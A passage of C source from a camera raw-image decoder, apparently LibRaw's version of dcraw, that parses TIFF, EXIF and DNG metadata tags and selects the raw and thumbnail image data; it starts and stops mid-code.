case 0xa435: // LensSerialNumber
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0xc630: // DNG LensInfo, Lens Specification per EXIF standard
imgdata.lens.MinFocal = getreal(type);
imgdata.lens.MaxFocal = getreal(type);
imgdata.lens.MaxAp4MinFocal = getreal(type);
imgdata.lens.MaxAp4MaxFocal = getreal(type);
break;
case 0xa433: // LensMake
stmread(imgdata.lens.LensMake, len, ifp);
break;
case 0xa434: // LensModel
stmread(imgdata.lens.Lens, len, ifp);
if (!strncmp(imgdata.lens.Lens, "----", 4))
imgdata.lens.Lens[0] = 0;
break;
case 0x9205:
imgdata.lens.EXIF_MaxAp = libraw_powf64(2.0f, (getreal(type) / 2.0f));
break;
// IB end
#endif
case 34306: /* Leaf white balance */
FORC4 cam_mul[c ^ 1] = 4096.0 / get2();
break;
case 34307: /* Leaf CatchLight color matrix */
fread (software, 1, 7, ifp);
if (strncmp(software,"MATRIX",6)) break;
colors = 4;
for (raw_color = i=0; i < 3; i++) {
FORC4 fscanf (ifp, "%f", &rgb_cam[i][c^1]);
if (!use_camera_wb) continue;
num = 0;
FORC4 num += rgb_cam[i][c];
FORC4 rgb_cam[i][c] /= MAX(1,num);
}
break;
case 34310: /* Leaf metadata */
parse_mos (ftell(ifp));
case 34303:
strcpy (make, "Leaf");
break;
case 34665: /* EXIF tag */
fseek (ifp, get4()+base, SEEK_SET);
parse_exif (base);
break;
case 34853: /* GPSInfo tag */
{
unsigned pos;
fseek(ifp, pos = (get4() + base), SEEK_SET);
parse_gps(base);
#ifdef LIBRAW_LIBRARY_BUILD
fseek(ifp, pos, SEEK_SET);
parse_gps_libraw(base);
#endif
}
break;
case 34675: /* InterColorProfile */
case 50831: /* AsShotICCProfile */
profile_offset = ftell(ifp);
profile_length = len;
break;
case 37122: /* CompressedBitsPerPixel */
kodak_cbpp = get4();
break;
case 37386: /* FocalLength */
focal_len = getreal(type);
break;
case 37393: /* ImageNumber */
shot_order = getint(type);
break;
case 37400: /* old Kodak KDC tag */
for (raw_color = i=0; i < 3; i++) {
getreal(type);
FORC3 rgb_cam[i][c] = getreal(type);
}
break;
case 40976:
strip_offset = get4();
switch (tiff_ifd[ifd].comp) {
case 32770: load_raw = &CLASS samsung_load_raw; break;
case 32772: load_raw = &CLASS samsung2_load_raw; break;
case 32773: load_raw = &CLASS samsung3_load_raw; break;
}
break;
case 46275: /* Imacon tags */
strcpy (make, "Imacon");
data_offset = ftell(ifp);
ima_len = len;
break;
case 46279:
if (!ima_len) break;
fseek (ifp, 38, SEEK_CUR);
case 46274:
fseek (ifp, 40, SEEK_CUR);
raw_width = get4();
raw_height = get4();
left_margin = get4() & 7;
width = raw_width - left_margin - (get4() & 7);
top_margin = get4() & 7;
height = raw_height - top_margin - (get4() & 7);
if (raw_width == 7262 && ima_len == 234317952 ) {
height = 5412;
width = 7216;
left_margin = 7;
filters=0;
} else if (raw_width == 7262) {
height = 5444;
width = 7244;
left_margin = 7;
}
fseek (ifp, 52, SEEK_CUR);
FORC3 cam_mul[c] = getreal(11);
fseek (ifp, 114, SEEK_CUR);
flip = (get2() >> 7) * 90;
if (width * height * 6 == ima_len) {
if (flip % 180 == 90) SWAP(width,height);
raw_width = width;
raw_height = height;
left_margin = top_margin = filters = flip = 0;
}
sprintf (model, "Ixpress %d-Mp", height*width/1000000);
load_raw = &CLASS imacon_full_load_raw;
if (filters) {
if (left_margin & 1) filters = 0x61616161;
load_raw = &CLASS unpacked_load_raw;
}
maximum = 0xffff;
break;
case 50454: /* Sinar tag */
case 50455:
if (len < 1 || len > 2560000 || !(cbuf = (char *) malloc(len))) break;
#ifndef LIBRAW_LIBRARY_BUILD
fread (cbuf, 1, len, ifp);
#else
if(fread (cbuf, 1, len, ifp) != len)
throw LIBRAW_EXCEPTION_IO_CORRUPT; // cbuf to be free'ed in recycle
#endif
cbuf[len-1] = 0;
for (cp = cbuf-1; cp && cp < cbuf+len; cp = strchr(cp,'\n'))
if (!strncmp (++cp,"Neutral ",8))
sscanf (cp+8, "%f %f %f", cam_mul, cam_mul+1, cam_mul+2);
free (cbuf);
break;
case 50458:
if (!make[0]) strcpy (make, "Hasselblad");
break;
case 50459: /* Hasselblad tag */
#ifdef LIBRAW_LIBRARY_BUILD
libraw_internal_data.unpacker_data.hasselblad_parser_flag=1;
#endif
i = order;
j = ftell(ifp);
c = tiff_nifds;
order = get2();
fseek (ifp, j+(get2(),get4()), SEEK_SET);
parse_tiff_ifd (j);
maximum = 0xffff;
tiff_nifds = c;
order = i;
break;
case 50706: /* DNGVersion */
FORC4 dng_version = (dng_version << 8) + fgetc(ifp);
if (!make[0]) strcpy (make, "DNG");
is_raw = 1;
break;
case 50708: /* UniqueCameraModel */
#ifdef LIBRAW_LIBRARY_BUILD
stmread(imgdata.color.UniqueCameraModel, len, ifp);
imgdata.color.UniqueCameraModel[sizeof(imgdata.color.UniqueCameraModel)-1] = 0;
#endif
if (model[0]) break;
#ifndef LIBRAW_LIBRARY_BUILD
fgets (make, 64, ifp);
#else
strncpy (make, imgdata.color.UniqueCameraModel, MIN(len, sizeof(imgdata.color.UniqueCameraModel)));
#endif
if ((cp = strchr(make,' '))) {
strcpy(model,cp+1);
*cp = 0;
}
break;
case 50710: /* CFAPlaneColor */
if (filters == 9) break;
if (len > 4) len = 4;
colors = len;
fread (cfa_pc, 1, colors, ifp);
guess_cfa_pc:
FORCC tab[cfa_pc[c]] = c;
cdesc[c] = 0;
for (i=16; i--; )
filters = filters << 2 | tab[cfa_pat[i % plen]];
filters -= !filters;
break;
case 50711: /* CFALayout */
if (get2() == 2) fuji_width = 1;
break;
case 291:
case 50712: /* LinearizationTable */
linear_table (len);
break;
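// cblack[4] and cblack[5] hold the BlackLevelRepeatDim pattern size; the
// per-cell black values from tag 50714 are stored starting at cblack[6].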
case 50713: /* BlackLevelRepeatDim */
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_cblack[4] =
#endif
cblack[4] = get2();
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_cblack[5] =
#endif
cblack[5] = get2();
if (cblack[4] * cblack[5] > (sizeof(cblack) / sizeof (cblack[0]) - 6))
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_cblack[4]=
imgdata.color.dng_levels.dng_cblack[5]=
#endif
cblack[4] = cblack[5] = 1;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 0xf00c: {
unsigned fwb[4];
FORC4 fwb[c] = get4();
if (fwb[3] < 0x100)
{
imgdata.color.WB_Coeffs[fwb[3]][0] = fwb[1];
imgdata.color.WB_Coeffs[fwb[3]][1] = imgdata.color.WB_Coeffs[fwb[3]][3] = fwb[0];
imgdata.color.WB_Coeffs[fwb[3]][2] = fwb[2];
if ((fwb[3] == 17) && libraw_internal_data.unpacker_data.lenRAFData>3 && libraw_internal_data.unpacker_data.lenRAFData < 10240000)
{
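// Fuji RAF: search the raw maker-note data block for the WB triple just read;
// once located, the neighbouring words hold the preset white-balance tables and,
// when present, a CCT-indexed WB table.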
long long f_save = ftell(ifp);
int fj, found = 0;
ushort *rafdata = (ushort*) malloc (sizeof(ushort)*libraw_internal_data.unpacker_data.lenRAFData);
fseek (ifp, libraw_internal_data.unpacker_data.posRAFData, SEEK_SET);
fread (rafdata, sizeof(ushort), libraw_internal_data.unpacker_data.lenRAFData, ifp);
fseek(ifp, f_save, SEEK_SET);
for (int fi=0; fi<(libraw_internal_data.unpacker_data.lenRAFData-3); fi++)
{
if ((fwb[0]==rafdata[fi]) && (fwb[1]==rafdata[fi+1]) && (fwb[2]==rafdata[fi+2]))
{
if (fi < 15 || rafdata[fi-15] != fwb[0]) continue; // guard against reading before the start of rafdata
fi = fi - 15;
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][3] = rafdata[fi];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][0] = rafdata[fi+1];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][2] = rafdata[fi+2];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] = rafdata[fi+3];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][0] = rafdata[fi+4];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][2] = rafdata[fi+5];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][3] = rafdata[fi+6];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][0] = rafdata[fi+7];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][2] = rafdata[fi+8];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][3] = rafdata[fi+9];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][0] = rafdata[fi+10];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][2] = rafdata[fi+11];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][3] = rafdata[fi+12];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][0] = rafdata[fi+13];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][2] = rafdata[fi+14];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] = rafdata[fi+15];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][0] = rafdata[fi+16];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][2] = rafdata[fi+17];
fi += 111;
for (fj = fi; fj<(fi+15); fj+=3)
if (rafdata[fj] != rafdata[fi])
{
found = 1;
break;
}
if (found)
{
int FujiCCT_K [31] = {2500,2550,2650,2700,2800,2850,2950,3000,3100,3200,3300,3400,3600,3700,3800,4000,4200,4300,4500,4800,5000,5300,5600,5900,6300,6700,7100,7700,8300,9100,10000};
fj = fj - 93;
for (int iCCT=0; iCCT < 31; iCCT++)
{
imgdata.color.WBCT_Coeffs[iCCT][0] = FujiCCT_K[iCCT];
imgdata.color.WBCT_Coeffs[iCCT][1] = rafdata[iCCT*3+1+fj];
imgdata.color.WBCT_Coeffs[iCCT][2] = imgdata.color.WBCT_Coeffs[iCCT][4] = rafdata[iCCT*3+fj];
imgdata.color.WBCT_Coeffs[iCCT][3] = rafdata[iCCT*3+2+fj];
}
}
free (rafdata);
break;
}
}
}
}
FORC4 fwb[c] = get4();
if (fwb[3] < 0x100)
{
imgdata.color.WB_Coeffs[fwb[3]][0] = fwb[1];
imgdata.color.WB_Coeffs[fwb[3]][1] = imgdata.color.WB_Coeffs[fwb[3]][3] = fwb[0];
imgdata.color.WB_Coeffs[fwb[3]][2] = fwb[2];
}
}
break;
#endif
#ifdef LIBRAW_LIBRARY_BUILD
case 50709:
stmread(imgdata.color.LocalizedCameraModel,len, ifp);
break;
#endif
case 61450:
cblack[4] = cblack[5] = MIN(sqrt((double)len),64);
case 50714: /* BlackLevel */
#ifdef LIBRAW_LIBRARY_BUILD
if(tiff_ifd[ifd].samples > 1 && tiff_ifd[ifd].samples == len) // LinearDNG, per-channel black
{
for(i=0; i < colors && i < 4 && i < len; i++)
imgdata.color.dng_levels.dng_cblack[i]=
cblack[i]=
getreal(type)+0.5;
imgdata.color.dng_levels.dng_black= black = 0;
}
else
#endif
if((cblack[4] * cblack[5] < 2) && len == 1)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_black=
#endif
black =
getreal(type);
}
else if(cblack[4] * cblack[5] <= len)
{
FORC (cblack[4] * cblack[5])
cblack[6+c] = getreal(type);
black = 0;
FORC4
cblack[c] = 0;
#ifdef LIBRAW_LIBRARY_BUILD
if(tag == 50714)
{
FORC (cblack[4] * cblack[5])
imgdata.color.dng_levels.dng_cblack[6+c]= cblack[6+c];
imgdata.color.dng_levels.dng_black=0;
FORC4
imgdata.color.dng_levels.dng_cblack[c]= 0;
}
#endif
}
break;
case 50715: /* BlackLevelDeltaH */
case 50716: /* BlackLevelDeltaV */
for (num=i=0; i < len && i < 65536; i++)
num += getreal(type);
black += num/len + 0.5;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_black += num/len + 0.5;
#endif
break;
case 50717: /* WhiteLevel */
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_whitelevel[0]=
#endif
maximum = getint(type);
#ifdef LIBRAW_LIBRARY_BUILD
if(tiff_ifd[ifd].samples > 1 ) // Linear DNG case
for(i=1; i < colors && i < 4 && i < len; i++)
imgdata.color.dng_levels.dng_whitelevel[i]=getint(type);
#endif
break;
case 50718: /* DefaultScale */
pixel_aspect = getreal(type);
pixel_aspect /= getreal(type);
if(pixel_aspect > 0.995 && pixel_aspect < 1.005)
pixel_aspect = 1.0;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 50778:
imgdata.color.dng_color[0].illuminant = get2();
break;
case 50779:
imgdata.color.dng_color[1].illuminant = get2();
break;
#endif
case 50721: /* ColorMatrix1 */
case 50722: /* ColorMatrix2 */
#ifdef LIBRAW_LIBRARY_BUILD
i = tag == 50721?0:1;
#endif
FORCC for (j=0; j < 3; j++)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_color[i].colormatrix[c][j]=
#endif
cm[c][j] = getreal(type);
}
use_cm = 1;
break;
case 0xc714: /* ForwardMatrix1 */
case 0xc715: /* ForwardMatrix2 */
#ifdef LIBRAW_LIBRARY_BUILD
i = tag == 0xc714?0:1;
#endif
for (j=0; j < 3; j++)
FORCC
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_color[i].forwardmatrix[j][c]=
#endif
fm[j][c] = getreal(type);
}
break;
case 50723: /* CameraCalibration1 */
case 50724: /* CameraCalibration2 */
#ifdef LIBRAW_LIBRARY_BUILD
j = tag == 50723?0:1;
#endif
for (i=0; i < colors; i++)
FORCC
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_color[j].calibration[i][c]=
#endif
cc[i][c] = getreal(type);
}
break;
case 50727: /* AnalogBalance */
FORCC{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.analogbalance[c]=
#endif
ab[c] = getreal(type);
}
break;
case 50728: /* AsShotNeutral */
FORCC asn[c] = getreal(type);
break;
case 50729: /* AsShotWhiteXY */
xyz[0] = getreal(type);
xyz[1] = getreal(type);
xyz[2] = 1 - xyz[0] - xyz[1];
FORC3 xyz[c] /= d65_white[c];
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 50730: /* DNG: Baseline Exposure */
baseline_exposure = getreal(type);
break;
#endif
// IB start
case 50740: /* tag 0xc634 : DNG Adobe, DNG Pentax, Sony SR2, DNG Private */
#ifdef LIBRAW_LIBRARY_BUILD
{
char mbuf[64];
unsigned short makernote_found = 0;
INT64 curr_pos, start_pos = ftell(ifp);
unsigned MakN_order, m_sorder = order;
unsigned MakN_length;
unsigned pos_in_original_raw;
fread(mbuf, 1, 6, ifp);
if (!strcmp(mbuf, "Adobe"))
{
order = 0x4d4d; // Adobe header is always in "MM" / big endian
curr_pos = start_pos + 6;
while (curr_pos + 8 - start_pos <= len)
{
fread(mbuf, 1, 4, ifp);
curr_pos += 8;
if (!strncmp(mbuf, "MakN", 4)) {
makernote_found = 1;
MakN_length = get4();
MakN_order = get2();
pos_in_original_raw = get4();
order = MakN_order;
parse_makernote_0xc634(curr_pos + 6 - pos_in_original_raw, 0, AdobeDNG);
break;
}
}
}
else
{
fread(mbuf + 6, 1, 2, ifp);
if (!strcmp(mbuf, "PENTAX ") ||
!strcmp(mbuf, "SAMSUNG"))
{
makernote_found = 1;
fseek(ifp, start_pos, SEEK_SET);
parse_makernote_0xc634(base, 0, CameraDNG);
}
}
fseek(ifp, start_pos, SEEK_SET);
order = m_sorder;
}
// IB end
#endif
if (dng_version) break;
parse_minolta (j = get4()+base);
fseek (ifp, j, SEEK_SET);
parse_tiff_ifd (base);
break;
case 50752:
read_shorts (cr2_slice, 3);
break;
case 50829: /* ActiveArea */
top_margin = getint(type);
left_margin = getint(type);
height = getint(type) - top_margin;
width = getint(type) - left_margin;
break;
case 50830: /* MaskedAreas */
for (i=0; i < len && i < 32; i++)
((int*)mask)[i] = getint(type);
black = 0;
break;
case 51009: /* OpcodeList2 */
meta_offset = ftell(ifp);
break;
case 64772: /* Kodak P-series */
if (len < 13) break;
fseek (ifp, 16, SEEK_CUR);
data_offset = get4();
fseek (ifp, 28, SEEK_CUR);
data_offset += get4();
load_raw = &CLASS packed_load_raw;
break;
case 65026:
if (type == 2) fgets (model2, 64, ifp);
}
fseek (ifp, save, SEEK_SET);
}
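/* If an encrypted Sony metadata block was found, decrypt it and re-parse it as a nested TIFF IFD. */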
if (sony_length && sony_length < 10240000 && (buf = (unsigned *) malloc(sony_length))) {
fseek (ifp, sony_offset, SEEK_SET);
fread (buf, sony_length, 1, ifp);
sony_decrypt (buf, sony_length/4, 1, sony_key);
#ifndef LIBRAW_LIBRARY_BUILD
sfp = ifp;
if ((ifp = tmpfile())) {
fwrite (buf, sony_length, 1, ifp);
fseek (ifp, 0, SEEK_SET);
parse_tiff_ifd (-sony_offset);
fclose (ifp);
}
ifp = sfp;
#else
if( !ifp->tempbuffer_open(buf,sony_length))
{
parse_tiff_ifd(-sony_offset);
ifp->tempbuffer_close();
}
#endif
free (buf);
}
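/*
Apply AnalogBalance to the camera calibration matrix, build cam_xyz from
CameraCalibration * ColorMatrix scaled by the white point, and derive
white balance multipliers from AsShotNeutral.
*/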
for (i=0; i < colors; i++)
FORCC cc[i][c] *= ab[i];
if (use_cm) {
FORCC for (i=0; i < 3; i++)
for (cam_xyz[c][i]=j=0; j < colors; j++)
cam_xyz[c][i] += cc[c][j] * cm[j][i] * xyz[i];
cam_xyz_coeff (cmatrix, cam_xyz);
}
if (asn[0]) {
cam_mul[3] = 0;
FORCC cam_mul[c] = 1 / asn[c];
}
if (!use_cm)
FORCC pre_mul[c] /= cc[c][c];
return 0;
}
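/*
Parse a TIFF header: check the byte-order marker ("II" or "MM"),
then walk the linked chain of IFDs with parse_tiff_ifd().
*/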
int CLASS parse_tiff (int base)
{
int doff;
fseek (ifp, base, SEEK_SET);
order = get2();
if (order != 0x4949 && order != 0x4d4d) return 0;
get2();
while ((doff = get4())) {
fseek (ifp, doff+base, SEEK_SET);
if (parse_tiff_ifd (base)) break;
}
return 1;
}
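/*
Pick the best IFD found by parse_tiff(): the largest suitable one becomes
the raw image (setting dimensions, bps, compression and load_raw), and a
smaller one is kept as the embedded thumbnail.
*/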
void CLASS apply_tiff()
{
int max_samp=0, ties=0, os, ns, raw=-1, thm=-1, i;
struct jhead jh;
thumb_misc = 16;
if (thumb_offset) {
fseek (ifp, thumb_offset, SEEK_SET);
if (ljpeg_start (&jh, 1)) {
if((unsigned)jh.bits<17 && (unsigned)jh.wide < 0x10000 && (unsigned)jh.high < 0x10000)
{
thumb_misc = jh.bits;
thumb_width = jh.wide;
thumb_height = jh.high;
}
}
}
for (i=tiff_nifds; i--; ) {
if (tiff_ifd[i].t_shutter)
shutter = tiff_ifd[i].t_shutter;
tiff_ifd[i].t_shutter = shutter;
}
for (i=0; i < tiff_nifds; i++) {
if (max_samp < tiff_ifd[i].samples)
max_samp = tiff_ifd[i].samples;
if (max_samp > 3) max_samp = 3;
os = raw_width*raw_height;
ns = tiff_ifd[i].t_width*tiff_ifd[i].t_height;
if (tiff_bps) {
os *= tiff_bps;
ns *= tiff_ifd[i].bps;
}
if ((tiff_ifd[i].comp != 6 || tiff_ifd[i].samples != 3) &&
unsigned(tiff_ifd[i].t_width | tiff_ifd[i].t_height) < 0x10000 &&
(unsigned)tiff_ifd[i].bps < 33 && (unsigned)tiff_ifd[i].samples < 13 &&
ns && ((ns > os && (ties = 1)) ||
(ns == os && shot_select == ties++))) {
raw_width = tiff_ifd[i].t_width;
raw_height = tiff_ifd[i].t_height;
tiff_bps = tiff_ifd[i].bps;
tiff_compress = tiff_ifd[i].comp;
data_offset = tiff_ifd[i].offset;
#ifdef LIBRAW_LIBRARY_BUILD
data_size = tiff_ifd[i].bytes;
#endif
tiff_flip = tiff_ifd[i].t_flip;
tiff_samples = tiff_ifd[i].samples;
tile_width = tiff_ifd[i].t_tile_width;
tile_length = tiff_ifd[i].t_tile_length;
shutter = tiff_ifd[i].t_shutter;
raw = i;
}
}
if (is_raw == 1 && ties) is_raw = ties;
if (!tile_width ) tile_width = INT_MAX;
if (!tile_length) tile_length = INT_MAX;
for (i=tiff_nifds; i--; )
if (tiff_ifd[i].t_flip) tiff_flip = tiff_ifd[i].t_flip;
if (raw >= 0 && !load_raw)
switch (tiff_compress) {
case 32767:
if (tiff_ifd[raw].bytes == raw_width*raw_height) {
tiff_bps = 12;
load_raw = &CLASS sony_arw2_load_raw; break;
}
if (!strncasecmp(make,"Sony",4) &&
tiff_ifd[raw].bytes == raw_width*raw_height*2) {
tiff_bps = 14;
load_raw = &CLASS unpacked_load_raw; break;
}
if (tiff_ifd[raw].bytes*8 != raw_width*raw_height*tiff_bps) {
raw_height += 8;
load_raw = &CLASS sony_arw_load_raw; break;
}
load_flags = 79;
case 32769:
load_flags++;
case 32770:
case 32773: goto slr;
case 0: case 1:
#ifdef LIBRAW_LIBRARY_BUILD
// Sony 14-bit uncompressed
if(!strncasecmp(make,"Sony",4) &&
tiff_ifd[raw].bytes == raw_width*raw_height*2)
{
tiff_bps = 14;
load_raw = &CLASS unpacked_load_raw;
break;
}
if(!strncasecmp(make,"Nikon",5) && !strncmp(software,"Nikon Scan",10))
{
load_raw = &CLASS nikon_coolscan_load_raw;
raw_color = 1;
filters = 0;
break;
}
#endif
if (!strncmp(make,"OLYMPUS",7) &&
tiff_ifd[raw].bytes*2 == raw_width*raw_height*3)
load_flags = 24;
if (tiff_ifd[raw].bytes*5 == raw_width*raw_height*8) {
load_flags = 81;
tiff_bps = 12;
} slr:
switch (tiff_bps) {
case 8: load_raw = &CLASS eight_bit_load_raw; break;
case 12: if (tiff_ifd[raw].phint == 2)
load_flags = 6;
load_raw = &CLASS packed_load_raw; break;
case 14: load_flags = 0;
case 16: load_raw = &CLASS unpacked_load_raw;
if (!strncmp(make,"OLYMPUS",7) &&
tiff_ifd[raw].bytes*7 > raw_width*raw_height)
load_raw = &CLASS olympus_load_raw;
}
break;
case 6: case 7: case 99:
load_raw = &CLASS lossless_jpeg_load_raw; break;
case 262:
load_raw = &CLASS kodak_262_load_raw; break;
case 34713:
if ((raw_width+9)/10*16*raw_height == tiff_ifd[raw].bytes) {
load_raw = &CLASS packed_load_raw;
load_flags = 1;
} else if (raw_width*raw_height*3 == tiff_ifd[raw].bytes*2) {
load_raw = &CLASS packed_load_raw;
if (model[0] == 'N') load_flags = 80;
} else if (raw_width*raw_height*3 == tiff_ifd[raw].bytes) {
load_raw = &CLASS nikon_yuv_load_raw;
gamma_curve (1/2.4, 12.92, 1, 4095);
memset (cblack, 0, sizeof cblack);
filters = 0;
} else if (raw_width*raw_height*2 == tiff_ifd[raw].bytes) {
load_raw = &CLASS unpacked_load_raw;
load_flags = 4;
order = 0x4d4d;
} else
#ifdef LIBRAW_LIBRARY_BUILD
if(raw_width*raw_height*3 == tiff_ifd[raw].bytes*2)
{
load_raw = &CLASS packed_load_raw;
load_flags=80;
}
else if(tiff_ifd[raw].rows_per_strip && tiff_ifd[raw].strip_offsets_count &&
tiff_ifd[raw].strip_offsets_count == tiff_ifd[raw].strip_byte_counts_count)
{
int fit = 1;
for(int i = 0; i < tiff_ifd[raw].strip_byte_counts_count-1; i++) // all but last
if(tiff_ifd[raw].strip_byte_counts[i]*2 != tiff_ifd[raw].rows_per_strip*raw_width*3)
{
fit = 0;
break;
}
if(fit)
load_raw = &CLASS nikon_load_striped_packed_raw;
else
load_raw = &CLASS nikon_load_raw; // fallback
}
else
#endif
load_raw = &CLASS nikon_load_raw; break;
case 65535:
load_raw = &CLASS pentax_load_raw; break;
case 65000:
switch (tiff_ifd[raw].phint) {
case 2: load_raw = &CLASS kodak_rgb_load_raw; filters = 0; break;
case 6: load_raw = &CLASS kodak_ycbcr_load_raw; filters = 0; break;
case 32803: load_raw = &CLASS kodak_65000_load_raw;
}
case 32867: case 34892: break;
#ifdef LIBRAW_LIBRARY_BUILD
case 8: break;
#endif
default: is_raw = 0;
}
if (!dng_version)
if ( ((tiff_samples == 3 && tiff_ifd[raw].bytes && tiff_bps != 14 &&
(tiff_compress & -16) != 32768)
|| (tiff_bps == 8 && strncmp(make,"Phase",5) &&
!strcasestr(make,"Kodak") &&
!strstr(model2,"DEBUG RAW")))
&& strncmp(software,"Nikon Scan",10))
is_raw = 0;
for (i=0; i < tiff_nifds; i++)
if (i != raw
&& (tiff_ifd[i].samples == max_samp || (tiff_ifd[i].comp == 7 && tiff_ifd[i].samples == 1)) /* Allow 1-bps JPEGs */
&& tiff_ifd[i].bps>0 && tiff_ifd[i].bps < 33
&& tiff_ifd[i].phint != 32803
&& tiff_ifd[i].phint != 34892
&& unsigned(tiff_ifd[i].t_width | tiff_ifd[i].t_height) < 0x10000 &&
tiff_ifd[i].t_width * tiff_ifd[i].t_height / (SQR(tiff_ifd[i].bps)+1) >
thumb_width * thumb_height / (SQR(thumb_misc)+1)
&& tiff_ifd[i].comp != 34892) {
thumb_width = tiff_ifd[i].t_width;
thumb_height = tiff_ifd[i].t_height;
thumb_offset = tiff_ifd[i].offset;
thumb_length = tiff_ifd[i].bytes;
thumb_misc = tiff_ifd[i].bps;
thm = i;
}
if (thm >= 0) {
thumb_misc |= tiff_ifd[thm].samples << 5;
switch (tiff_ifd[thm].comp) {
case 0:
write_thumb = &CLASS layer_thumb;
break;
case 1:
if (tiff_ifd[thm].bps <= 8)
write_thumb = &CLASS ppm_thumb;
else if (!strncmp(make,"Imacon",6))
write_thumb = &CLASS ppm16_thumb;
else
thumb_load_raw = &CLASS kodak_thumb_load_raw;
break;
case 65000:
thumb_load_raw = tiff_ifd[thm].phint == 6 ?
&CLASS kodak_ycbcr_load_raw : &CLASS kodak_rgb_load_raw;
}
}
}
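/*
Parse the Minolta MRW header: "PRD" holds the sensor dimensions,
"WBG" the white balance gains, "RIF" per-illuminant white balance
presets (DSLR-A100), and "TTW" an embedded TIFF block with the
remaining metadata.
*/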
void CLASS parse_minolta (int base)
{
int save, tag, len, offset, high=0, wide=0, i, c;
short sorder=order;
fseek (ifp, base, SEEK_SET);
if (fgetc(ifp) || fgetc(ifp)-'M' || fgetc(ifp)-'R') return;
order = fgetc(ifp) * 0x101;
offset = base + get4() + 8;
#ifdef LIBRAW_LIBRARY_BUILD
if(offset>ifp->size()-8) // At least 8 bytes for tag/len
offset = ifp->size()-8;
#endif
while ((save=ftell(ifp)) < offset) {
for (tag=i=0; i < 4; i++)
tag = tag << 8 | fgetc(ifp);
len = get4();
if(len < 0)
return; // bail out on an invalid (negative) length; raising a bad-file exception would be the alternative
switch (tag) {
case 0x505244: /* PRD */
fseek (ifp, 8, SEEK_CUR);
high = get2();
wide = get2();
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 0x524946: /* RIF */
if (!strncasecmp(model,"DSLR-A100", 9))
{
fseek(ifp, 8, SEEK_CUR);
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][2] = get2();
get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][3] =
